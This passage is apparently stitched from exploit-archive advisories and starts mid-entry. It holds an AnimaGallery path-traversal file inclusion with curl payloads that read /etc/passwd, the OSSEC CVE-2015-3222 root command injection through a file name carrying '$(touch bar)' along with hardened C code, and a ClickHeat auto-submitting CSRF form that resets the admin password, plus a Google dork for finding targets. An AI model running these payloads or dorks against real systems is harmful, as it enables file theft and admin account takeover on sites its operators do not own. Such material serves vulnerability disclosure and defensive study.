# Software Link: http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5, php 5.3.2, magic_quotes_gpc=off
# Category: webapps

* Description

func.php line 21 - 22:

include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');

The $THEME and $LANG parameters come from the import_theme_lang() function:

function import_theme_lang()
{
    $THEME = DEFAULT_THEME;
    if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
        $THEME = $_COOKIE['theme'];    // <-- Not Taint Checking
    $LANG = DEFAULT_LANG;
    if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
        $LANG = $_COOKIE['lang'];      // <--- Not Taint Checking
    return(array($THEME, $LANG));
}

* Proof of Concept

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"
curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
-
OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation
Fix for CVE-2015-3222 which allows for root escalation via syscheck - https://github.com/ossec/ossec-hids/releases/tag/2.8.2

Affected versions: 2.7 - 2.8.1

Beginning in OSSEC 2.7 (d88cf1c9) a feature was added to syscheck, which is the daemon that monitors file changes on a system, called "report_changes". This feature is only available on *NIX systems. Its purpose is to help determine what about a file has changed. The logic to accomplish this is as follows and can be found in src/syscheck/seechanges.c:

252     /* Run diff */
253     date_of_change = File_DateofChange(old_location);
254     snprintf(diff_cmd, 2048, "diff \"%s\" \"%s\"> \"%s/local/%s/diff.%d\" "
255              "2>/dev/null",
256              tmp_location, old_location,
257              DIFF_DIR_PATH, filename + 1, (int)date_of_change);
258     if (system(diff_cmd) != 256) {
259         merror("%s: ERROR: Unable to run diff for %s",
260                ARGV0, filename);
261         return (NULL);
262     }

Above, on line 258, the system() call is used to shell out to the system's "diff" command. The raw filename is passed in as an argument, which presents an attacker with the possibility to run arbitrary code. Since the syscheck daemon runs as the root user so it can inspect any file on the system for changes, any code run using this vulnerability will also be run as the root user. An example attack might be creating a file called "foo-$(touch bar)", which should create another file "bar".

Again, this vulnerability exists only on *NIX systems and is contingent on the following criteria:

1. A vulnerable version is in use.
2. The OSSEC agent is configured to use syscheck to monitor the file system for changes.
3. The list of directories monitored by syscheck includes those writable by underprivileged users.
4. The "report_changes" option is enabled for any of those directories.

The fix for this is to create temporary trusted file names that symlink back to the original files before calling system() and running the system's "diff" command.
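The root cause above is that a file name reaches "sh -c" as part of a command string. As an added example (not OSSEC's own patch, which instead diffs through trusted symlink names), the following C shows the alternative a defender would usually reach for: run diff with fork()/execvp() so the paths travel as separate argv entries and the output redirect is done with open()/dup2(), never through a shell. The function names run_diff_safe, write_file and compare_hostile_name, the scratch directory under /tmp and the sample file contents are this example's own constructions; the "$(touch bar)" name is the one from the advisory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable shape from seechanges.c, for contrast only (never call it): the
 * untrusted name is pasted into a command line that "sh -c" parses, so "$(...)"
 * inside it runs as root before diff even starts:
 *   snprintf(cmd, sizeof cmd, "diff \"%s\" \"%s\" > \"%s\"", tmp, old, out);
 *   system(cmd);                                                            */

/* Hardened replacement (added example; OSSEC's own fix used trusted symlink
 * names instead). Runs diff without a shell: the two paths are separate argv
 * entries, so metacharacters are never interpreted, and the ">" redirect is
 * done by the parent with open()/dup2() rather than by a command string.
 * Returns diff's exit status (0 identical, 1 different, 2 trouble) or -1 if
 * diff could not be started, was killed by a signal, or the output open failed. */
int run_diff_safe(const char *old_file, const char *new_file, const char *out_file)
{
    int out_fd = open(out_file, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0600);
    if (out_fd < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(out_fd);
        return -1;
    }
    if (pid == 0) {
        /* Child: stdout -> out_file, stderr -> /dev/null (mirrors the 2>/dev/null). */
        int devnull = open("/dev/null", O_WRONLY);
        if (dup2(out_fd, STDOUT_FILENO) < 0 || devnull < 0 || dup2(devnull, STDERR_FILENO) < 0)
            _exit(127);
        close(out_fd);
        close(devnull);
        /* argv is an array, not a string: no word splitting, no $(), no quoting bugs. */
        char *const argv[] = { (char *)"diff", (char *)old_file, (char *)new_file, NULL };
        execvp("diff", argv);
        _exit(127); /* only reached if exec failed */
    }
    close(out_fd);

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 127 ? -1 : WEXITSTATUS(status);
}

/* Small helper that creates the constructed sample files. */
int write_file(const char *path, const char *content)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    int ok = fputs(content, f) >= 0;
    return (fclose(f) == 0 && ok) ? 0 : -1;
}

/* Reproduces the advisory's scenario inside a scratch directory: two files whose
 * names carry "$(touch bar)" are diffed with run_diff_safe(). Returns diff's
 * status, or -2 if a file "bar" appeared in dir or in the current directory,
 * which is what the shell-based version would have produced. */
int compare_hostile_name(const char *dir, const char *old_content, const char *new_content)
{
    char old_path[PATH_MAX], new_path[PATH_MAX], out_path[PATH_MAX], bar_path[PATH_MAX];
    snprintf(old_path, sizeof old_path, "%s/foo-$(touch bar).old", dir);
    snprintf(new_path, sizeof new_path, "%s/foo-$(touch bar)", dir);
    snprintf(out_path, sizeof out_path, "%s/diff.out", dir);
    snprintf(bar_path, sizeof bar_path, "%s/bar", dir);
    if (write_file(old_path, old_content) != 0 || write_file(new_path, new_content) != 0)
        return -1;
    int status = run_diff_safe(old_path, new_path, out_path);
    if (access(bar_path, F_OK) == 0 || access("bar", F_OK) == 0)
        return -2; /* the name was executed: exactly the CVE-2015-3222 behaviour */
    return status;
}

int main(void)
{
    char dir[] = "/tmp/seechangesXXXXXX"; /* constructed scratch directory */
    if (mkdtemp(dir) == NULL)
        return 1;
    int status = compare_hostile_name(dir, "one\n", "one\ntwo\n");
    printf("diff exit status %d (expect 1: files differ, no 'bar' created)\n", status);
    return status == 1 ? 0 : 1;
}
```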
-
ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
# Google Dork: allinurl:/clickheat/
# Date: 11-06-2015
# Exploit Author: David Shanahan (@CyberpunkSec)
# Contact: https://twitter.com/CyberpunkSec
# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
# Version: 1.14
# Tested on: Windows

---- Description ----

ClickHeat is vulnerable to a CSRF attack because it does not implement a CSRF token when updating the config file. If an authenticated admin is tricked into opening this malicious URL, the form will be submitted, which changes the administrator password to the one the attacker has specified.

---- CSRF PoC ----

Set the value of "adminLogin" to the administrator's username, then set the value of "adminPass" to an md5 hash of the password you want. (You may also need to change the "logPath" & "cachePath".)

/* CODE */
<body onload="document.forms[0].submit()">
<form action="http://127.0.0.1/clickheat/index.php?action=config" method="post" class="center">
<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"adminLogin";s:5:"admin";s:9:"adminPass";s:32:"5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}" />
<input type="hidden" name="save" value="true" />
<input type="submit" value="Save configuration" />
</form>
/* CODE */

---- Solution ----

The ClickHeat project seems to be dead, as it has not been updated since late 2011. Due to this, I truly doubt a patch will be issued, so I would recommend removing this product from your website.